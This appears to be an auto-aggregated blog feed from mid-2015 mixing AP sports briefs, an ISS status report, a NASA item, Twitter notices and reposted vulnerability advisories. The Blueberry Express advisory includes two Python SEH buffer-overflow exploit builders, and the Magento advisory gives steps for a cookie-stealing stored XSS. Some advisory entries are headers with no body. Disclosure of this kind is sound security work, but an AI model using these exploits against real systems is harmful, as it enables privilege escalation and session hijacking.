CONCEPCION, Chile (AP) Lionel Messi is a step closer to finally breaking through with Argentina.

from FOX Sports Digital http://ift.tt/1NvRBM7
via IFTTT

Spanish club Rayo to support charities with jersey sales

MADRID (AP) Spanish football club Rayo Vallecano says it will donate to charitable causes such as ones fighting cancer and sexual discrimination for each of its away jerseys sold this season.

from FOX Sports Digital http://ift.tt/1KrksRO
via IFTTT

Anonymous on Twitter: "Shout outs to the people mimicking my work. http://ift.tt/1HuCqlG"

Anonymous retweeted Agent 301 ... Anonymous added, ... thought you were a collective. kinda hard to look for glory while being literally anonymous.

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/YourAnonNews/status/616041572962971648&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNHN_aa7XoSDzzC98k5zmVchM8qnZg
via IFTTT

Clyne, Osvaldo leave Southampton as transfer window opens

LONDON (AP) Southampton sold Nathaniel Clyne to Liverpool and ended Dani Osvaldo's expensive stay at the club on the opening day of Europe's summer transfer window in the English Premier League.

from FOX Sports Digital http://ift.tt/1BYmbfW
via IFTTT

These Are The FBI's Most Wanted Hackers — Total $4.2 Million Reward

The US State Department and the Federal Bureau of Investigation are willing to pay a total of $4.2 Million for information leading to the arrest and/or conviction of the top 5 most wanted cyber criminals accused of conducting frauds of hundreds of millions of dollars. Evgeniy Bogachev, 30; Nicolae Popescu, 34; Alexsey Belan, 28; Peteris Sahurovs, 26; and Shailesh Kumar Jain, 45; are in the list of


from The Hacker News http://ift.tt/1Huq3G4
via IFTTT

Argentina routs Paraguay 6-1, reaches Copa America final

CONCEPCION, Chile (AP) Lionel Messi helped set up five goals as Argentina trounced Paraguay 6-1 in the Copa America semifinals on Tuesday, setting up a final against host Chile.

from FOX Sports Digital http://ift.tt/1U7Q6s7
via IFTTT

ISS Daily Summary Report – 06/30/15

Plant Gravity Sensing-2 (PGS-2) Photon Counting Unit (PCU) Checkout: Kelly attached PCUs to the CBEF Incubator Unit (IU) 1-Gravity (1-G) centrifuge. Japan Aerospace Exploration Agency (JAXA) ground controllers downlinked data from the Plant Experiment Unit (PEU) through the Image Processing Unit (IPU) and reviewed data from the installed PCU. The first run of PGS-2 is planned for July 8. Plants growing on Earth can detect gravity, which enables them to grow their stalks in the opposite direction as their roots. But scientists do not yet understand the chemical process controlling plants response to gravity. Concentrations of calcium in plant cells change in response to various factors, including temperature and touch, and changes in the direction of gravity when plants grown under 1g condition on the earth, but scientists are not sure whether gravity also affects calcium levels in plants grown in microgravity conditions. Utilization of the micro gravity condition to examine the cellular process of formation of the gravity sensor and the molecular mechanism of gravity sensing (Plant Gravity Sensing) studies whether plants grown in microgravity conditions can sense the changes in the gravitational acceleration, and the concentrations of calcium in plant cells changes.

Binary Colloidal Alloy Test – Low Gravity Phase Kinetics Platform (BCAT-KP) Sample Initiation: Kelly set up the sample image, homogenized a sample, took manual photos using EarthKam software, and initiated automated photography utilizing the camera intervalometer. This sample is the tenth and final sample for BCAT-KP. BCAT-KP provides a platform for material and industrial scientists to investigate colloid phase changes, providing results that may be used to develop new colloidal materials and formulations with unique properties. The results may support new applications, from new liquid crystals to consumer goods having longer shelf life and uses.

Rodent Research (RR) Inventory and Audit: Kelly audited remaining RR equipment and supplies and consolidated equipment. The number of remaining supplies will provide information for manifesting for future RR experiments.

Human Research Facility Personal Computer-2 (HRF PC-2) Troubleshooting: In late April, HRF PC2 failed to respond to ground commands. The power supply brick was changed following several instances of circuit breaker trips. Commanding capability was recovered for one activation, however, subsequent activations were not successful via ground commanding. Today Kelly performed troubleshooting to address the “no Ethernet cable connected” notification. Troubleshooting steps were successful and the HRF PC2 was returned to working order.

Today’s Planned Activities
All activities were completed unless otherwise noted.
- Plant Gravity Sensing 2 (PGS2) Experiment Photon Counting Unit Check Out Preparation
- JEM Terminal Computer Reboot
- Inspecting RS Structural Elements Shell Surfaces using МВП-2К device.
- Counter Measure System (CMS) Harmful Contaminant Measurements in SM
- Audio Dosimeter Preparation
- ISS RS Atmosphere Analysis Using АОК ГАНК-4М [Aborted]
- OBT ISS Crew Medical Officer (CMO) Computer Based Training (CBT)
- Plant Gravity Sensing-2 Experiment Photon Counting Unit Check Out
- Rodent Research Inventory Audit and Disposal of Some Items
- FGB 800А (А71) Unit Replacement
- Starting Photography of Binary Colloidal Alloy Test Sample (BCAT)
- TORU OBT. Tagup with Instructor
- PGS2 Closeout Ops
- WRS – Recycle Tank Fill from EDV
- HRF2 PC2 Troubleshooting
- Rodent Research Inventory Audit and Disposal of Some Items
- OTKLIK. Hardware Check
- СОЖ Maintenance
- IMS Delta File Prep
- COSMOCARD. Closeout Ops.

Completed Task List Items
None

Ground Activities
All activities were completed unless otherwise noted.
- METERON laptop command
- POIC weekly system maintenance

Three-Day Look Ahead:
Wednesday, 07/01: EHS acoustic dosimeter setup, JEMRMS activation/checkout
Thursday, 07/02: Multi-user Droplet Combustion Apparatus MWA Prep, CIR Hardware Review/hardware gather, HRF2 Supply Kit Resupply, Reconnection of MagVector Umbilicals to COL1F2 UIP
Friday, 07/03: JEMRMS BDS Reconfig/checkout, Acoustic Dosimeters data transfer/stow, BCAT Intervalometer Change, MDCA h/w replace

QUICK ISS Status – Environmental Control Group:

Component | Status
Elektron | On
Vozdukh | Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”) | Off
[СКВ] 2 – SM Air Conditioner System (“SKV2”) | On
Carbon Dioxide Removal Assembly (CDRA) Lab | Standby
Carbon Dioxide Removal Assembly (CDRA) Node 3 | Operate
Major Constituent Analyzer (MCA) Lab | Shutdown
Major Constituent Analyzer (MCA) Node 3 | Operate
Oxygen Generation Assembly (OGA) | Standby
Urine Processing Assembly (UPA) | Standby
Trace Contaminant Control System (TCCS) Lab | Off
Trace Contaminant Control System (TCCS) Node 3 | Full Up

from ISS On-Orbit Status Report http://ift.tt/1LUDK0W
via IFTTT

Ex-coach Scala leads group attempting to revive Parma

PARMA, Italy (AP) Former coach Nevio Scala is leading a group of investors applying to revive bankrupt club Parma in the fourth division.

from FOX Sports Digital http://ift.tt/1T5oIJU
via IFTTT

Cisco to Buy OpenDNS Company for $635 Million

Cisco, a networking giant that offers traditional network edge protection, has announced that the company is buying cloud-based security company OpenDNS for $635 Million. Yes, OpenDNS, whose Domain Name Services (DNS) you might have used to avoid regional restrictions or to improve your Internet connection. However, Cisco is not making the acquisition of OpenDNS for any of the above


from The Hacker News http://ift.tt/1IsDkzN
via IFTTT

Petr Cech: Arsenal matches my ambition to win trophies

PRAGUE (AP) Petr Cech says it was the hardest decision of his career to agree on a transfer from Chelsea following 11 successful years to English Premier League rival Arsenal.

from FOX Sports Digital http://ift.tt/1GYSTwN
via IFTTT

Liverpool signs England defender Clyne from Southampton

LIVERPOOL, England (AP) England defender Nathaniel Clyne has become the fourth player to join Liverpool from Southampton in the past year after signing for a reported fee of 12.5 million pounds ($19.7 million).

from FOX Sports Digital http://ift.tt/1GYSTgz
via IFTTT

Ivory Coast names 5 candidates for new coach

ABIDJAN, Ivory Coast (AP) The Ivory Coast Football Federation has named Michel Dussuyer and Henry Kasperczak in a list of five candidates for new coach of the African champion.

from FOX Sports Digital http://ift.tt/1Ju5t8d
via IFTTT

Monaco signs France U21 midfielder Bahlouli on 5-year deal

MONACO (AP) Monaco has signed France Under-21 attacking midfielder Fares Bahlouli from Lyon on a five-year contract.

from FOX Sports Digital http://ift.tt/1NvbPWz
via IFTTT

Bayern Munich signs Brazil midfielder Douglas Costa

MUNICH (AP) Bayern Munich has signed Brazil midfielder Douglas Costa from Ukrainian side Shakhtar Donetsk.

from FOX Sports Digital http://ift.tt/1Nv9QS5
via IFTTT

France to host Germany in November friendly

PARIS (AP) France will host Germany in November in a friendly at the Stade de France as part of its preparations for the 2016 European Championship.

from FOX Sports Digital http://ift.tt/1C8Dag0
via IFTTT

Colombian striker Martinez moves to Atletico Madrid

LISBON, Portugal (AP) Atletico Madrid is paying 35 million euros ($39 million) to bring Colombia international Jackson Martinez from FC Porto.

from FOX Sports Digital http://ift.tt/1FQrQ2R
via IFTTT

I have a new follower on Twitter


Norman
Marketing Manager for @my1login by day and night. In my spare time I'm @paddlescotland. My brilliant wee nephew in the pic!
Scotland
http://t.co/KFhJlG0YgD
Following: 9630 - Followers: 9893

July 01, 2015 at 06:14AM via Twitter http://twitter.com/NormanM1L

[FD] Blueberry Express v5.9.x - SEH Buffer Overflow Vulnerability

Document Title:
===============
Blueberry Express v5.9.x - SEH Buffer Overflow Vulnerability

References (Source):
====================
http://ift.tt/1U0Avuk

Video: http://ift.tt/1Ly7jHv

Release Date:
=============
2015-06-29

Vulnerability Laboratory ID (VL-ID):
====================================
1535

Common Vulnerability Scoring System:
====================================
6.4

Product & Service Introduction:
===============================
Create engaging movies by adding text, sound and images to your screen recording. Make sure your audience doesn't miss a thing with easy-to-use Zoom-Pan and AutoScroll effects. Create polished tutorials and presentations with the help of powerful editing functions. Do it the easy way with BB FlashBack screen recorder. It's never been easier for everyone to see your movies. BB FlashBack screen recorder shares with FlashBack Connect or Youtube to display your movies on all devices. (FlashBack Connect is currently in Beta, and available only to Pro and Standard edition purchasers.)

(Copy of the Vendor Homepage: http://ift.tt/1iDTUMM )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a local SEH buffer overflow vulnerability in the official Blueberry Express v5.9.0.3678 software.

Vulnerability Disclosure Timeline:
==================================
2015-06-29: Researcher Notification & Coordination (Ateeq Khan)

Discovery Status:
=================
Published

Affected Product(s):
====================
Blueberry Software
Product: Blueberry Express - Software 5.9.0.3678

Exploitation Technique:
=======================
Local

Severity Level:
===============
High

Technical Details & Description:
================================
A local SEH Buffer Overflow vulnerability has been discovered in the official Blueberry Express v5.9.0.3678 software. The vulnerability allows a local or remote attacker to gain higher system or access privileges by exploitation of a classic SEH buffer overflow vulnerability.

The local SEH Buffer Overflow affects multiple products including the BBFlashBack Recorder, Batch Export etc. Other products using similar modules might also be affected. The vulnerability can be exploited by local attackers with a low privilege system user account.

The attack vector of the issue is server-side and the request method to execute the shellcode is local. The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4. Successful exploitation of this vulnerability results in complete compromise of the affected machine and system process.

Proof of Concept (PoC):
=======================
The buffer overflow vulnerability can be exploited by local attackers with a restricted system user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

POC Description:
For the POC, the researcher installed the software with admin privileges on a Windows system (allowed to run for all users) and, while the application was still running in the background, logged off and logged in with a different (low privileged) user. The vulnerability was exploited successfully, giving the researcher a system shell with elevated admin privileges. Privilege escalation is possible in this scenario. Malware won't be able to exploit this vulnerability remotely as this is a local exploit.

Manual steps to reproduce the vulnerability ...
1) Run BB Flashback Express Recorder
2) Goto TOOLS > OPTIONS > MISC
3) Click on "Use custom folder" under the Temp Folder module
4) Copy / Paste the POC binary code (record.txt) into the input field of custom folder
5) Click OK

Note: Calculator should popup hence proving the existence of this vulnerability

PoC: Exploitcode

# Exploit Title: Blueberry Express Recorder SEH based buffer overflow (Local) Exploit
# Discovered by: Ateeq Khan - @ohtheITguy (http://ift.tt/1jnqRwA)

# Windows Calc.exe Shellcode - Metasploit
shellcode = ("")  # placeholder: Metasploit calc.exe payload bytes

push="\x90" * 288 # Starting offset
nseh="\xeb\x06\x90\x90" # Short jump
seh="\xf3\x43\x10\x40" # POP/POP/RET - [vcl60.bpl] [NoSafeSEH]
nopsled="\x90" * 30 # NOPsled

print "Creating expoit file"
f=open("recorder.txt","w")
try:
    f.write(push+nseh+seh+nopsled+shellcode)
    f.close()
    print "File created"
except:
    print "File cannot be created"

PoC#2: Exploitcode

# Exploit Title: Blueberry Express Batch Export SEH based buffer overflow (Local)
# Discovered by: Ateeq Khan - @ohtheITguy (http://ift.tt/1jnqRwA)

print "Creating expoit file"
f=open("batch.txt","w") #Create the file

# Windows Calc.exe Shellcode - Metasploit
shellcode = ("")  # placeholder: Metasploit calc.exe payload bytes

push="\x90" * 6596 # Starting offset
nseh="\xeb\x06\x90\x90" # Short jump
seh="\xf3\x43\x10\x40" # POP/POP/RET - [vcl60.bpl] [NoSafeSEH]
nopsled="\x90" * 30 # NOPsled

try:
    f.write(push+nseh+seh+nopsled+shellcode)
    f.close()
    print "File created"
except:
    print "File cannot be created"

Reference(s):
http://ift.tt/LqNi9y
http://ift.tt/1rwwez3

Security Risk:
==============
The security risk of the local seh buffer overflow software vulnerability is estimated as high. (CVSS 6.4)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq Khan (Ateeq@evolution-sec.com)

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose.
Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x
Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab
Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS
Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

[FD] FCS Scanner v1.0 & v1.4 iOS - Command Inject Vulnerability

[FD] Ebay Magento Bug Bounty #14 - Persistent Description Vulnerability

Document Title:
===============
Ebay Magento Bug Bounty #14 - Persistent Description Vulnerability

References (Source):
====================
http://ift.tt/1U3OHTo

EIBBP-31602

Release Date:
=============
2015-06-30

Vulnerability Laboratory ID (VL-ID):
====================================
1463

Common Vulnerability Scoring System:
====================================
3.8

Product & Service Introduction:
===============================
Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites.

Our team of security professionals works hard to keep Magento customer information secure. What's equally important to protecting this data? Our security researchers and user community. If you find a site that isn't following our policies, or a vulnerability inside our system, please tell us right away.

( Copy of the Vendor Homepage: http://ift.tt/1E22539 & http://ift.tt/1E22539 )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an application-side cross site scripting web vulnerability in the Magento Commerce web-application.

Vulnerability Disclosure Timeline:
==================================
2015-03-17: Researcher Notification & Coordination (Hadji Samir)
2015-03-18: Vendor Notification (eBay Inc Security Team - Bug Bounty Program)
2015-04-03: Vendor Response/Feedback (eBay Inc Security Team - Bug Bounty Program)
2015-05-16: Vendor Fix/Patch (Magento Developer Team)
2015-06-30: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Ebay Inc.
Product: Magento - Connect Web Application 2015 Q2

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
An application-side cross site scripting web vulnerability has been discovered in the official Magento Connect web-application. The vulnerability allows remote attackers to inject their own script code into the application-side of the affected application module.

Remote attackers are able to inject their own script code into the url description link input of the send message module in magento-connect. Remote attackers are able to inject their own script code into the profile description url to compromise user/moderator/admin session data. The request method to inject is POST and the attack vector is located on the application-side of the affected module.

The security risk of the application-side cross site vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8. Exploitation of the persistent input validation web vulnerability requires a low privileged web-application user account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules (api).

Vulnerable Service(s):
[+] Magento Connect

Vulnerable Module(s):
[+] send message magento-connect

Vulnerable Parameter(s):
[+] url link description

Proof of Concept (PoC):
=======================
The application-side vulnerability can be exploited by remote attackers with a low privileged application user account and low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the security vulnerability ...
1. Register a Magento account
2. Login to the service
3. Surf to the profile service
4. Inject own script code payload with document.cookie/domain request to the url description input field
5. Save the input
6. The script code execution occurs in the next layer where the input is visible as profile
7. Successful reproduce of the security vulnerability!

POC: Exploitcode (js)

Source: Gmail -> IFTTT-> Blogger

[FD] Pinterest Bug Bounty #1 - Persistent contact_name Vulnerability

Collision again raises issue of concussions in World Cup

MONTREAL (AP) Germany coach Silvia Neid said forward Alexandra Popp did not have a concussion after banging heads with U.S. midfielder Morgan Brian in the first half of the women's World Cup semifinal.

from FOX Sports Digital http://ift.tt/1GLMfXv
via IFTTT

An Unusual Mountain on Asteroid Ceres


What created this large mountain on asteroid Ceres? No one is yet sure. As if in anticipation of today being Asteroid Day on Earth, the robotic spacecraft Dawn in orbit around Ceres took the best yet image of an unusually tall mountain on the Asteroid Belt's largest asteroid. Visible at the top of the featured image, the exceptional mountain rises about five kilometers up from an area that otherwise appears pretty level. The image was taken about two weeks ago from about 4,400 kilometers away. Although origin hypotheses for the mountain include volcanism, impacts, and plate tectonics, clear evidence backing any of these is currently lacking. Also visible across Ceres' surface are some enigmatic light areas: bright spots whose origin and composition also remain an active topic of investigation. Even though Dawn is expected to continue to orbit Ceres, officially dubbed a dwarf planet, for millions of years, the hydrazine fuel used to point Dawn's communications antenna toward Earth is expected to run out sometime next year.

via NASA http://ift.tt/1U2H5k3

Wanderers sign former Barcelona youth product

SYDNEY (AP) Western Sydney Wanderers have signed former Barcelona youth player Andreu Guerao Mayoral for the next A-League season.

from FOX Sports Digital http://ift.tt/1GLvqvY
via IFTTT

Tuesday, June 30, 2015

I have a new follower on Twitter


Mary


http://t.co/XZdolcjITH
Following: 1829 - Followers: 1282

June 30, 2015 at 11:38PM via Twitter http://twitter.com/3000Sweden